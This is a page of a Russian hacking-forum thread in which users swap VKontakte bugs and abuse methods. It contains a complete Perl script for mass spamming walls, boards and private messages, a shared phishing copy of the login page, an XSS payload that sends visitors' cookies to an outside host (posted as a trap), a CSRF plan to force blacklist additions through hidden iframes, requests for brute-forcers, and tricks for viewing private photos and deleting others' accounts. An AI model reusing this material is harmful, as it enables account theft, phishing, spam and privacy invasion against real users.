Вход

Просмотр полной версии : Некоторые баги vkontakte.ru


Страницы : 1 2 3 [4] 5 6 7

Screw
01.11.2008, 12:18
Эти значения могут быть просто кусками хеша, какого нить значения, связанного с каждой фоткой

VasyaP
01.11.2008, 12:35
Эти значения могут быть просто кусками хеша, какого нить значения, связанного с каждой фоткой
Ну я попробовал посмотреть MD5 (как загружаемого оригинала, так и уже существующих там фоток) - нет, ничего похожего... :(

nepster
01.11.2008, 15:51
Кто там говорил , что нашел пасивную xss ?

geforse
01.11.2008, 17:36
nepster
Правдо думаеш, что тебе её скажут ? = )

//Даже если она есть))

Sarkis
01.11.2008, 17:39
и правиьно зделают шо не скажут,дуров сцука эту тему каждый день читает,почти все баги прикрыл :( ы

Qws
01.11.2008, 18:28
контакт на sql,или на как кой то другой базе даних?

sms_spam
02.11.2008, 17:49
как проспамить вручную с аккаунта в личку всем друзьям сразу(около 3к друзей)?

__XT__
02.11.2008, 18:13
Павел Дуров очень любит мух))
http://vkontakte.ru/test.php

geforse
02.11.2008, 20:48
__XT__
На каждой 10-той странице этой темы про эту муху написано = )

sabe
05.11.2008, 18:16
http://vkontakte.ru/page73043

как же этим не воспользоватся..

podkashey
06.11.2008, 13:36
контакт на sql,или на как кой то другой базе даних?
ИМХО тут не реляционная БД, а блять объектно-ориентированная или многомерная даже. Ты прав, в этом и весь геморой был гыы...

DJ_Grop
06.11.2008, 21:52
Но как из этого получить закономерность - непонятно.
Ну неужели всё это рандомно? Так хочется смотреть закрытые большие фото... :(
закономерность ясен пень есть... в общем попробовал найти соотношения... при делении индексов фотографий в 16й системе выходит 1 (перепробовал массу примеров), при делении в 10й системе выходит 1,0ХХХХХ(полный калькулятор), осталось только понять по какому принципу берутся вот эти ХХХХХ, в каждом случае разные числа...

AFoST
06.11.2008, 22:27
может кто находил)
Короч уматно можно посмотреть все граффити, какие народ рисует))
http://vkontakte.ru/wall.php?act=draw&grid=87113322
http://vkontakte.ru/wall.php?act=draw&grid=87113321
http://vkontakte.ru/wall.php?act=draw&grid=87113399
http://vkontakte.ru/wall.php?act=draw&grid=[тут номерочег]

Chaak
07.11.2008, 17:27
Через дуров.ру можно посмотреть закрытые фотки:
http://durov.ru/index.html#1;onphoto=907_203233
Разработчики ВК:
http://cs24.userapi.com/u38492/809374/x_64adc446c7.jpg

Stz1
07.11.2008, 19:42
Через дуров.ру можно посмотреть закрытые фотки:

Разработчики ВК:
http://cs24.userapi.com/u38492/809374/x_64adc446c7.jpg
я не понял))а как именно фтограффий можно просматривать?)

nec
07.11.2008, 19:51
туманно как-то

DJ_Grop
08.11.2008, 19:26
через дуров.ру можно смотреть только аватары в полный размер... функции просмотра фотографиий вообще не нашел....

BuG_4F
08.11.2008, 19:57
дуров.ру ваще не рабит =\

skulltrail
08.11.2008, 20:14
через дуров.ру можно смотреть только аватары в полный размер... функции просмотра фотографиий вообще не нашел....
какие функции? через дуров.ру можно просматривать закрытые фотографии просто щелкая на них. главное чтоб страница была не закрытой.

geforse
08.11.2008, 20:29
Чёт защёл я на дуров.ру ... выбрал страну---город---универ---и он мне предложил зарегиться .... эт что новая соц сеть чтоли ? o_0

DJ_Grop
08.11.2008, 22:19
какие функции? через дуров.ру можно просматривать закрытые фотографии просто щелкая на них. главное чтоб страница была не закрытой.
походу прикрыли уже... не отображаются скрытые просто...

geforse
09.11.2008, 15:00
вы шо все с ума посходили? там вверху страницы есть поле для авторизации.

ПЫЩЬ ПЫЩЬ = )
Сори не заметил ... действительно есть такое (:

КИНГ
09.11.2008, 19:07
фейк страницы http://vkontakte.ru/login.php?u=1 выложите с меня +3

>.:!FrE!:.<
10.11.2008, 00:50
фейк страницы http://vkontakte.ru/login.php?u=1 выложите с меня +3

Вот пожалусто;)
Фейк делал сам, полностью функциональный.

http://webfile.ru/2375990
pass: antichat.ru

Fepsis
11.11.2008, 16:53
закономерность ясен пень есть... в общем попробовал найти соотношения... при делении индексов фотографий в 16й системе выходит 1 (перепробовал массу примеров), при делении в 10й системе выходит 1,0ХХХХХ(полный калькулятор), осталось только понять по какому принципу берутся вот эти ХХХХХ, в каждом случае разные числа...
что на что ты делишь..??!

DJ_Grop
11.11.2008, 22:14
что на что ты делишь..??!
16й код маленькой картинки переводишь в 10ю систему, потом код большой картинки так же, и делишь код маленькой на код большой.

Micr0b
12.11.2008, 01:06
вопрос.. есть какая штука чуваки рейтинг накручивают за малую суму денег намного меньше чем в самом вконтакте.. мне так накрутили.. я заметил что когда они так делаю т то полоска при просмотре репы от человека которой дал ее имеет цвет такойже льогко жолтый как при добавление +1 ибо когда добавляют +8 или +3 цвет другой.. вашы предложения по етому поводу.. походу говоря тут дело мне кажеца в самой отправке через телефон както пакет отслежываеца и подмениваеца... ..

Fepsis
12.11.2008, 01:27
16й код маленькой картинки переводишь в 10ю систему, потом код большой картинки так же, и делишь код маленькой на код большой.
Нет, так не катит... вот пример:
http://cs588.vkontakte.ru/u13667803/55150963/m_e529c660.jpg
http://cs588.vkontakte.ru/u13667803/55150963/x_8f10fed7.jpg
Даже не переводя в 10-ю видно, что e529c660>8f10fed7 т.е. при делении будет 1,ххххххх...
Пример №2:
http://cs588.vkontakte.ru/u13667803/55150963/m_1cf4e45f.jpg
http://cs588.vkontakte.ru/u13667803/55150963/x_c7250140.jpg
1cf4e45f<c7250140 будешь делить - будет 0,ххххх...
Не катит..(((

Пётр
12.11.2008, 01:28
Вот пожалусто;)
Фейк делал сам, полностью функциональный.

http://webfile.ru/2375990
pass: antichat.ru
да, круто... тока у меня при заполнении данных и отправке на log.php вылазит ошибка серва, типа нет доступа, ошибка 500 короч, поясните... (права 777 даже дал, всё равно)

Пётр
12.11.2008, 02:41
извиняюсь, поспешил!
сам разобрался, на другом серве пашед, всё ок!

sabe
12.11.2008, 05:58
Micr0b
javascript))

DJ_Grop
12.11.2008, 20:30
Нет, так не катит... вот пример:
http://cs588.vkontakte.ru/u13667803/55150963/m_e529c660.jpg
http://cs588.vkontakte.ru/u13667803/55150963/x_8f10fed7.jpg
Даже не переводя в 10-ю видно, что e529c660>8f10fed7 т.е. при делении будет 1,ххххххх...
Пример №2:
http://cs588.vkontakte.ru/u13667803/55150963/m_1cf4e45f.jpg
http://cs588.vkontakte.ru/u13667803/55150963/x_c7250140.jpg
1cf4e45f<c7250140 будешь делить - будет 0,ххххх...
Не катит..(((
видимо я просто не все варианты рассмотрел...
кстати, правда может было уже, есть способ смотреть альбомы людей с закрытым профилем (если сами альбомы не заблокированы) просто вводишь адрес
http://vkontakte.ru/photos.php?id=юзерайди
либо если смотреть фотографии с пользователем
http://vkontakte.ru/photos.php?act=user&id=юзерайди

Пётр
13.11.2008, 01:03
ребят, у меня вопрос... а саму страничку вконтакте можно удалить? звучит глупо... но я не нашёл в настройках там кнопку/ссылку удалить страничку...
если просто сменить пасс - владелец его восстановит... если только заранее мыло его сломать, но это сложнее... или удаление акка тоже с подтверждением на мыло?
заранее спс.

Alexandr II
13.11.2008, 01:18
ребят, у меня вопрос... а саму страничку вконтакте можно удалить? звучит глупо... но я не нашёл в настройках там кнопку/ссылку удалить страничку...
если просто сменить пасс - владелец его восстановит... если только заранее мыло его сломать, но это сложнее... или удаление акка тоже с подтверждением на мыло?
заранее спс.
Мои Настройки => Приватность => Самая последняя графа "Кто может смотреть мою страницу" ... и самый последний пункт...

Пётр
13.11.2008, 01:32
Мои Настройки => Приватность => Самая последняя графа "Кто может смотреть мою страницу" ... и самый последний пункт...
спс огромное, невнимательно все пункты прошёл =)

Fepsis
13.11.2008, 01:45
если просто сменить пасс - владелец его восстановит....
УДАЛЯЯ СТРАНИЦУ БЛИЖНЕГО СВОЕГО, ПОМНИ - В ТЕЧЕНИИ МЕСЯЦА ЕЁ МОЖНО ВОССТАНОВИТЬ.. ТАК ЧТО ЛОМАЙ МЫЛО..)))

Пётр
13.11.2008, 02:03
УДАЛЯЯ СТРАНИЦУ БЛИЖНЕГО СВОЕГО, ПОМНИ - В ТЕЧЕНИИ МЕСЯЦА ЕЁ МОЖНО ВОССТАНОВИТЬ.. ТАК ЧТО ЛОМАЙ МЫЛО..)))
капс не рулит =) а за совет спс... бла, жизнь зла)))))
мыло ломать я "не умею", самый лёгкий и действующий способ через fake попробую... бруты фтопку =\

Don1=2
13.11.2008, 02:07
Поросёнок Пётр решил стать готом.И начал красить свою комнатуВ готичный чёрный цвет.А потом он сел на стул, и началдумать про боль и смерть.

Пётр
13.11.2008, 02:09
Поросёнок Пётр решил стать готом.И начал красить свою комнатуВ готичный чёрный цвет.А потом он сел на стул, и началдумать про боль и смерть.
хм... всегда удивлялся почему я так притягиваю, не буду говорит кого... у меня для срача нет настроения, сорь :р

NubЯra
13.11.2008, 14:56
Этот спамер еще актуален?

#!/usr/bin/perl -w


use LWP 5.64;
use HTTP::Cookies;
use HTTP::Request::Common;
use URI::Escape;

my $use_proxy = 'proxy'; # proxy address here

my $login_mail = '@mail';
my $login_pass = 'pass';
# URL we want to post to
my $url_post = 'http://vkontakte.ru';

my $msg_file = '~/.quotes.txt';

# Quotes delimiter.
# To separate qoutes with ONE new line: $delim = "\r\n"; (or "\n" in UNIX EOL mode)
# To separate qoutes with TWO new lines: $delim = "\r\n\r\n"; (or "\n\n" in UNIX EOL mode)
# To separate qoutes with any symbol: $delim = "_symbol_";
# Note that you must put "\" before Perl's special symbols: ", ', (, ), [, ], and others
my $delim = "\r\n\r\n";
my $repeat = 1000; # repeat count
my $delay = 4; # 4 is minimum delay for walls,albums and boards. 5 - for mail
my $postfix = 1; # set 1 if you want to post many equal messages

my $useragent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1;) Firefox/2.0.0.0';
my $url_login = 'http://vkontakte.ru/login.php';

my $ua = LWP::UserAgent->new(keep_alive => 1, requests_redirectable => [ 'POST', 'GET' ]);
$ua->proxy('http', $use_proxy) if $use_proxy;
$ua->agent($useragent);
$ua->cookie_jar({});

print 'Login... ';
my $response = $ua->post($url_login,
[ 'email' => $login_mail,
'pass' => $login_pass,
]);
die 'Login error -- ', $response->status_line
unless $response->is_success or $response->code == 302;
print "Success.\n";
srand;

print 'Load quotes... ';
my $buff;
my $filedata;
open(MSG, $msg_file) or die "open error!";;
binmode MSG;
while (read(MSG, $buff, 1024)) { $filedata .= $buff; }
@messages = split $delim, $filedata;
print "Success...\n";

print 'Get URL content... ';
$response = $ua->get($url_post);
die 'Get page error -- ', $response->status_line
unless $response->is_success or $response->code == 302;
print "Success.\n";
my $cont = $response->content;
my $url = $url_post;
my $res; my $app='';

L0: foreach $message (@messages) {
# add random number to the end of the message
$app = int(rand(999999999)) if $postfix;

$_ = $cont;
if ($cont =~ /action\s*=\s*\"wall.php\"\s*name\s*=\s*\"postMessage\"\s*id\s*=\s*\"postMessage\"/) {
($res) = /makeFRequest\s*\(\s*\'\s*wall\.php\?([^\?]+)\'\s*,\s*3\s*\)/;
$url = 'http://vkontakte.ru/wall.php?'."$res";
($id_value) = /name\s*=\s*\"to_id\"\s*value\s*=\s*\"(\w+)\"/;
$req = POST $url, Content_Type => 'application/x-www-form-urlencoded',
Content => [
to_id => $id_value,
act => 'sent',
message => "$message"."\n$app"
];
} elsif ($cont =~ /id\s*=\s*\"comment\"\s*name\s*=\s*\"comment\"\s*action\s*=\s*\'photos.php\'/) {
$url = 'http://vkontakte.ru/photos.php';
($id_value) = /name\s*=\s*\"id\"\s*value\s*=\s*\"([^\"]+)\"/;
($aid) = /name\s*=\s*\"aid\"\s*value\s*=\s*\"(\d+)\"/;

$req = POST $url, Content_Type => 'application/x-www-form-urlencoded',
Content => [
id => $id_value,
aid => $aid,
act => 'post',
comment => "$message"."\n$app",
add_bookmark => '1'
];
} elsif ($cont =~ /action\s*=\s*\"board.php\"\s*name\s*=\s*\"editPost\"\s*id\s*=\s*\"editPost\"/) {
($id_value) = /name\s*=\s*\"id\"\s*value\s*=\s*\"(\d+)\"/;
$url = 'http://vkontakte.ru/board.php?act=newtopic&id='.$id_value;
($hash) = /name\s*=\s*\"hash\"\s*value\s*=\s*\"(\w+)\"/;
print "$url\n$hash\n";
$req = POST $url, Content_Type => 'application/x-www-form-urlencoded',
Content => [
act => 'do_new_topic',
id => $id_value,
hash => $hash,
title => substr($message,0,32),
post => $message
];
} elsif ($cont =~ /id\s*=\s*\"postmessage\"\s*name\s*=\s*\"postmessage\"\s*action\s*=\s*\'board.php\'/) {
$url = 'http://vkontakte.ru/board.php';
($id_value) = /name\s*=\s*\"tid\"\s*value\s*=\s*\"(\d+)\"/;
($gid) = /name\s*=\s*\"gid\"\s*value\s*=\s*\"(\d+)\"/;

$req = POST $url, Content_Type => 'application/x-www-form-urlencoded',
Content => [
tid => $id_value,
gid => $gid,
act => 'do_add_post',
post => "$message"."\n$app",
add_bookmark => '1'
];
} elsif ($cont =~ /action\s*=\s*\"mail.php\"\s*name\s*=\s*\"postMessage\"\s*id\s*=\s*\"postMessage\"/) {
$url = 'http://vkontakte.ru/mail.php';
($id_secure) = /name\s*=\s*\"secure\"\s*value\s*=\s*\"(\w+)\"/;
($id_photo) = /name\s*=\s*\"photo\"\s*value\s*=\s*\"(\w+)\"/;
($id_value) = /name\s*=\s*\"to_id\"\s*value\s*=\s*\"(\d+)\"/;
$req = POST $url, Content_Type => 'application/x-www-form-urlencoded',
Content => [
secure => $id_secure,
photo => $id_photo,
to_id => $id_value,
to_reply => '0',
act => 'sent',
title => substr($message,0,32),
message => "$message"."\n$app"
];
}

print 'Send... ';
$response = $ua->request($req);
do { warn 'Post error -- ', $response->status_line; next; }
unless $response->is_success or $response->code == 302;
print "Success.\n";
sleep $delay;
}

goto L0 if ($repeat--);

Есла да, то у меня запускатся нехоч :( Не знаю толи дело в прокси, то ли у меня руки не из того места. Добрый люди дайте живой прокси, или обьясните нубу что не так(

geforse
13.11.2008, 15:51
Добрый люди дайте живой прокси

Возьмите (http://forum.antichat.ru/thread34819.html)

Пётр
14.11.2008, 00:34
Да, кто юзает фейк от >.:!FrE!:.<, исправьте ошибку в index.html:
<title>В Контакте | Проверка подлинности акуанта</title>
слово "акуанта" -> "аккаунта"

Вроде мелоч, но палево :)

F1shka
14.11.2008, 00:49
Скрипт на перле от Кайна вроде не работает, есть что? на php от мафиози или чака не предлагать - НЕТ денег. Если что - в личку

BuG_4F
14.11.2008, 17:59
What is ?:)
http://img3.imageshost.ru/imgs/51450d059e71defa122a301dec5e2ea3/009498146a00f50c37dee8bd60336967.jpg

*D1VER
16.11.2008, 00:12
Способ следить за теми кто заходит на вашу страничку вкантакте...

Делаем следующее:


Загружаем любую фотку к себе в фотоальбом ...

Заходим в этот альбом и на той фотке которую загрузили нажимаем кнопачку [Отметить человека]

Вылезает окошко с пустым полем и списком ваших друзей которых вы можете отметить...

Дальше пишем такой код в пустое поле и нажимаем [Добавить]

Затем Ставим эту фотку в качестве Аватарки к себе на страничку и ждём Сообщений о том кто посещал вашу страничку в недельный период.

код таков:

<img src=javasсript:x=document.сооkiе;s="http://4you.h2m.ru/images/?pic=1&q=";out=s+x; document.location.href=out;>

Elfxb rekvtuf [fwrths )))

ad1d0s
16.11.2008, 00:16
Интересно попробуем =)

Xtrem
16.11.2008, 00:37
а как потом ее на аватор ставить? сохранять на комп, или как

Пётр
16.11.2008, 00:42
хм, интересно :)

Vallez
16.11.2008, 01:17
да поподробнее .

Fepsis
16.11.2008, 01:19
Интересно попробуем =)
Аха... давайте давайте пробуйте... только сначала внимательно на скрипт гляньте и поинтересуйтесь что такое "http://4you.h2m.ru" и нахрена туда передавать куки...)))

Vallez
16.11.2008, 01:21
вот это меня и смутило ) жду когда кто-то проверит.

Xtrem
16.11.2008, 01:23
угу..сайт и куки сомнительно. я на левом попробовал, но с аваторкой туго.

ToniKapuchon
16.11.2008, 01:37
ну и чё отметил я на свой снифак? сохранил на комп залил обратно - не пашет!!

Fepsis
16.11.2008, 01:39
Дааа... я сначала думал нам багу подарили..(((( Не пашет..((

F1shka
16.11.2008, 15:23
Дааа... я сначала думал нам багу подарили..(((( Не пашет..((
ХЫ, ктож тут что подарит.. Кто если не ты сам, когда если не сейчас? :)

Stalk
16.11.2008, 15:28
Блина а фига оно должно пахать картинкой?
Отметить, поставить ссылку, а потом ету фотку на обложку фотоальбома, тогда будет прогружатся, когда ктото втыкает страничку. Ну какого оно будет пахать если отметив снифер ты просто ето делаеш на фотке в контакте, фотка не меняется никак и вобще как можно простой фоткой на сниффер посылать, если она даже не загружена на свой сервер...

nc.STRIEM
16.11.2008, 15:35
Способ следить за теми кто заходит на вашу страничку вкантакте...

Делаем следующее:


Загружаем любую фотку к себе в фотоальбом ...

Заходим в этот альбом и на той фотке которую загрузили нажимаем кнопачку [Отметить человека]

Вылезает окошко с пустым полем и списком ваших друзей которых вы можете отметить...

Дальше пишем такой код в пустое поле и нажимаем [Добавить]

Затем Ставим эту фотку в качестве Аватарки к себе на страничку и ждём Сообщений о том кто посещал вашу страничку в недельный период.

код таков:

<img src=javasсript:x=document.сооkiе;s="http://4you.h2m.ru/images/?pic=1&q=";out=s+x; document.location.href=out;>

Elfxb rekvtuf [fwrths )))


Развод это.
XSS действиетельно рабочая, но срабатывает ток тогда когда ты отмечеш человека, после обновления паги XSS уже не работает. Естсетственно поставить на аватарку картинку с отметкой нельзя, и тут расчет на то что некоторые пользователи тупа скопируют код с поста автора, и впишубе себе на странице, а автор получит куки. Причем автор даж не удосужился нормально сформировать код, чтоб он работал во всех браузерах, и как результат XSS не у всех пашет из за кривизны кода.
Вобщем это просто развод, а *D1VER забаньте наxyй\

Блина а фига оно должно пахать картинкой?
Отметить, поставить ссылку, а потом ету фотку на обложку фотоальбома, тогда будет прогружатся, когда ктото втыкает страничку. Ну какого оно будет пахать если отметив снифер ты просто ето делаеш на фотке в контакте, фотка не меняется никак и вобще как можно простой фоткой на сниффер посылать, если она даже не загружена на свой сервер...
ваше xyйню какуюто отписал

Guron_18
16.11.2008, 15:48
Мне интересно стало возможно ли в фото альбом запихать пхп картинку?? и что с этого может получиться?

nc.STRIEM
16.11.2008, 15:52
Мне интересно стало возможно ли в фото альбом запихать пхп картинку?? и что с этого может получиться?
нет

Stalk
16.11.2008, 15:53
2nc.STRIEM
Да и в правду фигню написал, а то что оно работать не будет я первый всеже высказался)
И реально при чем там куки.....

Еще, если картинка на обложке фотоальбома, а при погрузке страницы именно етот альбом высветился и картинка прогрузилась, то получается не будут прогружатся отметки и даже сама картинка, а только тамбнеил (тип уменьшеная копия)....
Так что тот пост можете удалить... или можете оставить, чтобы никто такое не написал больше)

Мне интересно стало возможно ли в фото альбом запихать пхп картинку?? и что с этого может получиться?
А как ты себе ето представляеш?

nc.STRIEM
16.11.2008, 16:03
2nc.STRIEM
Да и в правду фигню написал, а то что оно работать не будет я первый всеже высказался)
И реально при чем там куки.....

Еще, если картинка на обложке фотоальбома, а при погрузке страницы именно етот альбом высветился и картинка прогрузилась, то получается не будут прогружатся отметки и даже сама картинка, а только тамбнеил (тип уменьшеная копия)....
Так что тот пост можете удалить...


А как ты себе ето представляеш?
Вот именно что работать будет, но не так как описано, а так как нужно автору.
Вставь в то поле код

<img src=. OnError="JavaScript:alert(document.cookie)">

Увидел свои куки? знач все работает)
Разница этого, и придыдушего кода в том что:
1) этот работает во всех браузерах - тот нет
2) этот показывает куки алертом - тот отправляет их автору


этой баге уже с полгода, ток она бесполезна, т.к. чтоб сработала ксс нужно самому вручную встаить загадочный код, поэтому пользы от нее 0

Fepsis
16.11.2008, 16:11
эх, народ.. прикроют же..(( давайте додумывать сами теперь.. и так много сказано...

*D1VER
16.11.2008, 18:24
nc.STRIEM, маладец +1 ))
Правда код я написал на диких отходняках , даж непроверял но суть ты уловил...

А банить меня необязательно )))

geforse
16.11.2008, 21:22
эх, народ.. прикроют же..(( давайте додумывать сами теперь.. и так много сказано...

Чего прикроют ? этот бред ? o_0

F1shka
16.11.2008, 21:57
Чего прикроют ? этот бред ? o_0
Пашини шныри и шестёрки всё прикрывают, кроме своей жопы. А докапаться и достолба можно. :D

Sarkis
18.11.2008, 02:11
как зделать страницу в тегах <br>?

ToniKapuchon
18.11.2008, 02:24
кстати тож интересно! дофига страниц с жирными буквами))

AdReNa1!Ne
18.11.2008, 12:26
http://vkontakte.ru/club4782103

Группа, вступив в которую, выделяет некоторые надписи на странице жирным шрифтом.

How to create?

Это очень просто. При создании группы, меняете поле input на textarea.
Вводите любое название, и после него 62 нажатия на enter (по крайней мере я так делал). Готово)

Баг вызван множеством ошибок в css-стилях

F1shka
18.11.2008, 12:34
Вообще то есть куча групп, где описывается как при создании новой страницы оформить её "красиво"

u36a
18.11.2008, 12:43
Приветствую, раньше была возможность встроить линки на игнор лист

http://vkontakte.ru/settings.php?act=addToBlackList&id=1

в iframe или обычный frame, тогда пользователь заходит на сайт и у него автоматически, указанные люди добавляются в игнор лист. Щас такую возможность порезали, вконтакт отвечает:

Security Breach or Incorrect Firewall. ...

Как можно обойти эту защиту и вообще на чём она основывается, вконтакт что ли как-то js'ом проверяет, что его страница не во iframe или frame?

Просто у меня есть доступ пару тематических сайтов, где грутится один круг людей, хотелось бы встроить им в код такую фичу. Конечно ж желательно, чтобы было "без палева" при просмотре.

F1shka
18.11.2008, 12:46
http://vkontakte.ru/club2528065
http://vkontakte.ru/club2180828
http://vkontakte.ru/club1628
Вот эти группы помогут, кому интересно конечно же

[:|||||:]
18.11.2008, 12:48
имхо там проверка referrer

u36a
18.11.2008, 13:11
При чём, если на локальном компе открыть html с

<iframe src=http://vkontakte.ru/settings.php?act=addToBlackList&id=2873797>

то всё откроется, стоит залить на какой-нить хост и обратиться, то хрен..

AdReNa1!Ne
18.11.2008, 13:35
Возможно сделали проверку на referrer

u36a
18.11.2008, 13:42
Вы что посты что ли набиваете? Если просто открыть браузер с ссылкой на добавление в игнор-лист, то всё будет ок. А в таком случае рефера нет. Значит с рефером данная проверка наврядли связана. Также почитайте мой прошлый пост, почему так? Мб проверка на содержание строки браузера?

AdReNa1!Ne
18.11.2008, 13:48
Друг, как раз ты и набиваешь посты. Как ты понимаешь - "проверка на содержание строки браузера"? Это $_GET[параметр]. И чем он будет отличаться от того, когда ты просто в браузер вводишь или с другого хоста?
<iframe src=http://vkontakte.ru/settings.php?act=addToBlackList&id=2873797>
И кстати, на будущее, многие браузеры при переходе по фрейму вбивают реферрер хоста.

u36a
18.11.2008, 15:20
Просто когда ты открываешь ссылку в браузере изначально, то рефера нет и быть не может.. Или если ты с закладок ссылку открыл, но ведь вконтакт её воспринимает.

//добавлено..

Действительно рефер.. Проверил через live-http-headers..

Извиняюсь тогда на кого выступил на счёт набивания постов :-[ ..

Тогда собственно вопрос, как можно обмануть эту систему? Установить нужный рефер через js? Или открыть во фрейме сначала сам vkontakte.ru, а через тот же js или как-то ещё открыть в нужном фрейме уже линк добавления в игнор?

idTalis
18.11.2008, 19:42
Подскажите актуальный на данный момент брутфорс, по возможности приводите ссылки

Sarkis
19.11.2008, 01:25
Как посмотреть предложение "Хотели бы вы...?" на закрытой странице. Рассказываю.

Даже если у человека закрыта для просмотра вами страница, то вопрос формата "Хотели бы вы...?", если он задан посмотреть можно так:

/matches.php?act=a_sent&dec=1&to_id=[id_страницы]

Переходя по этой ссылке мы ПРИНИМАЕМ предложение, кнопка "Да, конечно.", даже не видя сам вопрос. Затем чтобы посмотреть что же там за вопрос стоял - переходим в принятые вами предложения:

/matches.php?act=sent

Там соответственно смотрим вопрос и как вариант нажимаем "отменить согласие", дабы не палиться =)

ЗЫ Спасибо за внимание, сорри если боян =)

i4ig0
19.11.2008, 15:51
вконтакте был подвержен ддос атаке =)))
http://vkontakte.ru/infested_ip_list.html
еще одна интересная штучка
http://vkontakte.ru/feed2.php
кстати никто не может мне помочь, меня вчера пометили, вот такой фигней

Информация на данной странице может не соответствовать действительности. (подробнее)

Часть информации на этой странице может быть ложной. Некоторые пользователи считают, что в ней содержится ненастоящее имя или фотография.

и после этого я больше не могу зайти к себе в профиль, а когда нажимаю на послать пароль на мыло, то ничего не приходит =(( причем раньше когда меня так помечали ничего такого не было.... :(
а забыл сказать, что к тому же удалили почти все мои фэйки за раз.... (аж 4 штуки, только 2 остались)

Sarkis
19.11.2008, 17:56
люди как можно зделать такой альбом?

http://vkontakte.ru/id16831997

i4ig0
19.11.2008, 18:38
люди как можно зделать такой альбом?

http://vkontakte.ru/id16831997


просто берешь эту картинку и ставишь ее как обложку! :D

Sarkis
19.11.2008, 19:02
ыыыыыыыы

Sarkis
19.11.2008, 19:05
не,не хочет так(

BuG_4F
19.11.2008, 19:25
Это наверно с помощью gif patcher , кто-то выкладывал ...

i4ig0
19.11.2008, 19:27
не, если картинка длинная, то она должна растягиваться, хотя вроде недавно админы прикрыли эту фигню....

_nic
19.11.2008, 21:07
Можно к кому то в друзья самому добавится,или это из раздела фантастики?

Calcutta
19.11.2008, 21:12
Можно к кому то в друзья самому добавится,или это из раздела фантастики?
Нет, сынок, это фантастика. ©

Ctr1A1tDe1ete
19.11.2008, 21:13
из раздела фантастики... просто способ сложный... узнать маил и пасс этого "кого-то" и добавить себя )

DJ_Grop
19.11.2008, 23:04
ТОВАРИЩИ!!!! НЕ ПИШИТЕ ЗДЕСЬ О НАЙДЕННЫХ БАГАХ!!! ТУТ ЖЕ ПРИКРЫВАЮТ!!!! НЕ ОБЛАМЫВАЙТЕСЬ САМИ И НЕ ОБЛАМЫВАЙТЕ ДРУГИХ!!!!!!!!!!!!!

gold-goblin
19.11.2008, 23:10
товарищь... в чем тогда смысл этого сайта? писать а я вот багу нашёл, но вам не скажу?

Sarkis
19.11.2008, 23:13
говори тем кому доверяешь,в ЛС

здесь лолище Дуров Оо

gold-goblin
19.11.2008, 23:19
сори опять за оффтоп.
Sarkis так зачем для этого сайт??? есть ася, м агент да и емаил....

DJ_Grop
19.11.2008, 23:51
народ, если кто нибудь знает как посмотреть историю новостей стукните в ЛС

idTalis
20.11.2008, 00:03
Подскажите плиз, работают ли сейчас спамеры? просто сам в контакте не зарегистрирован, не задрачиваюсь этим, но слышал что ввели каптчу, интересует работают ли спамеры, если да то какие...

k0lbasa
20.11.2008, 11:17
работают

Пётр
20.11.2008, 12:49
ужс, вычисляем Дурова! :D

i4ig0
21.11.2008, 00:17
вот что нашел :D
http://cs1250.vkontakte.ru/upload.php
http://api.vkontakte.ru/api.php

georgich
21.11.2008, 01:27
Приветствую. Удалить свою анкету напрочь самому как-нибудь можно?

Пётр
21.11.2008, 01:30
Приветствую. Удалить свою анкету напрочь самому как-нибудь можно?
я уже это спрашивал :)
Настройки - Приватность - последняя строчка "Никто, удалить мою страницу"

georgich
21.11.2008, 01:40
я уже это спрашивал :)
Настройки - Приватность - последняя строчка "Никто, удалить мою страницу"
Да это фуфло. Я 2,5 месяца после этой ботвы не появлялся и что вы думаете? Удалили напрочь? Как же. Вбил пароль и вуаля - моя страница живее всех живых.

NiGHT[aNgeL]
21.11.2008, 04:24
скажу такой баг фконтакте хД сам проверил
сделал дурову +80 (и того +8 10раз) и в каждом окну когда вбивал рэйтинг там можно писать и юзера надпись будет, ну вот я написал дурову 10разных сообщений оскорбительных :D И мою страницу удалили хДД обидно то что было 4111 рэйтинга =(

Ducati
21.11.2008, 10:56
хотелось бы узнать, есть ли способ подняять рейтинг без sms?
ответ в лс плиз

Ducati
23.11.2008, 00:53
ну на мониторе можно что угодно нарисовать, а вот сделать это в инете - другое дело =)

да и 3 миллиона многовато

F1shka
23.11.2008, 03:52
ну на мониторе можно что угодно нарисовать, а вот сделать это в инете - другое дело =)

да и 3 миллиона многовато
Пиши в личку\асю. Всё скажу, помогу.

M1ks
23.11.2008, 10:37
мене тоже скажи :)

Sarkis
25.11.2008, 01:09
http://vkontakte.ru/board.php?act=topic&tid=7339979&st=100

как они так пишут? ыы

или после того как они отписываются все наченают писать жирным и жёлтым шрифтом!можно как то так зделать?или баги уже прикрыты?

_nic
25.11.2008, 20:50
Можно как то узнать прочитали ли твое сообщение в личку?

geforse
25.11.2008, 21:38
Можно как то узнать прочитали ли твое сообщение в личку?

Ладно ... выкладываю в паблик =/

Пишем сообщение
Заходим сюды (http://vkontakte.ru/mail.php)
Не прочитали (http://pic.ipicture.ru/uploads/081125/6uwkf5n77W.jpg)
Прочитали (http://ipicture.ru/Gallery/View/9549970.html)

_nic
25.11.2008, 23:37
Я имел ввиду прочитали и неответили.

sabe
26.11.2008, 06:58
нужно проэксплуатировать http://durov.ru

geforse
26.11.2008, 14:51
Я имел ввиду прочитали и неответили.

Не пойму что ты хочеш ? o_0

Вот ты отослал сообщение человеку, он его прочитал и не ответил и на твоей странице сообщение становится "бледным"

number0
26.11.2008, 21:24
Не могу утверждать баг это или глюк, но при отправке ЛС пользователю мне выдаёт сегодня весь день:

http://s58.radikal.ru/i159/0811/bb/a02e0d6f33c1.jpg

Milaja
26.11.2008, 23:42
всем приветики!!!
а подскажите,..кому-нибудь удавалась взломать страничку чужую в контакте?)))

TheSoul
26.11.2008, 23:44
Ага... удавалось :rolleyes:

Bmite
26.11.2008, 23:54
ещё глюк!!!!
вообщем сегодня понадобился 1 акк ПУСТОЙ!зарегать не удалось,потмоу что с базой вконаткте что то не то%)перезагружают вообщем....нашел акк в котором самое малое колво друзей,начал их удалять,т.к. акк нужен был именно пустой!удалил чтук 40 и тут мне выдает,типа данный запрос слишком часто используется%)вообщем захожу под этими данными через минут 20-тоже самое пишет%)я хз что такое:(

k0lbasa
27.11.2008, 00:02
ну и вопрос))

F1shka
27.11.2008, 00:28
ну и вопрос))
нашёл новую SQL-INJINI

preda1or
27.11.2008, 01:44
смотреть участников группы/высланные приглашения/поданные заявки
http://vkontakte.ru/groups.php?act=members&pagesfull/act=getpagesfull&gid=2&op=0
http://vkontakte.ru/groups.php?act=members&pagesfull/act=getpagesfull&gid=2&op=1
